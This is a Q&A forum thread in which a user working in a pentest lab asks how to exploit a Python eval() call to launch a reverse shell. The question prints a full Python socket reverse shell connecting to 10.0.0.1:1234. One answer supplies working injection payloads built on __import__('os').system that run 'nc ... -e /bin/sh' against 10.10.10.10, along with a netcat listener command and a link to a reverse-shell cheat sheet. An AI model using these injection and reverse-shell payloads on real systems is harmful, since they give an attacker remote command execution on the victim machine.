Python - running reverse shell inside eval()

Question

I am working on a pentest lab. There is a Python eval() function I need to exploit.

It is like

eval('%s>1',payload)

I need to execute a Python reverse shell script as payload. It is

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

I am trying like

eval('%s >1' "__import__('os').system('import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'")

Not sure how to import all those modules and execute it.

Any help appreciated.

Answer 1

Try to include globals() and locals() in the eval (to import into the global scope). This is explained in In Python, why doesn't an import in an exec in a function work?

Also see https://lucumr.pocoo.org/2011/2/1/exec-in-python/ chapter Behind the Scenes of Imports

Answer 2

Maybe try like this

"__import__('os').system('nc your_ip port -e /bin/sh')"

like;

First listen port fresh terminal

nc -lvp 1234

after try another terminal:

"__import__('os').system('nc 10.10.10.10 1234 -e /bin/sh')"

"__import__('os').system('YOUR REVERSE SHELL METHOD')"

here's many reverse shell payload : https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

good luck